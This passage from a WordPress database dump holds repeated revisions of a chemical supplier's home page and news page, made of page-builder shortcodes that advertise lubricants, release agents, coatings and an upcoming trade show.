link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="26" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:23:26', '2017-05-02 19:23:26', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4148, 2, '2017-05-02 19:27:49', '2017-05-02 19:27:49', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="5"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:27:49', '2017-05-02 19:27:49', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4149, 2, '2017-05-02 19:28:27', '2017-05-02 19:28:27', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:28:27', '2017-05-02 19:28:27', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4150, 2, '2017-05-02 19:29:18', '2017-05-02 19:29:18', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:29:18', '2017-05-02 19:29:18', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4151, 0, '2017-05-02 19:39:36', '2017-05-02 19:39:36', '', '', '', 'publish', 'closed', 'closed', '', '4151', '', '', '2017-05-02 19:39:36', '2017-05-02 19:39:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4151/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4152, 2, '2017-05-02 19:40:42', '2017-05-02 19:40:42', '[row]\r\n\r\n[col span="3"]\r\n<h3>Upcoming Trade Shows</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nSAMPE - Seattle 2017\r\n\r\nDate: May 22-25, 2017\r\n\r\nMiller-Stephenson will be exhibiting at the SAMPE 2017 show in Seattle. Learn more about how <a href="https://www.miller-stephenson.com/krytox/">Krytox</a> and <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">Release Agents</a> can help advance your technology.\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n<h3>Miller-Stephenson &amp; Chemours Official Channel Partners</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\r\n\r\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\r\n\r\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="200"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2017-05-02 19:40:42', '2017-05-02 19:40:42', '', 118, 'https://www.miller-stephenson.com/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4153, 2, '2017-05-02 19:42:25', '2017-05-02 19:42:25', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" 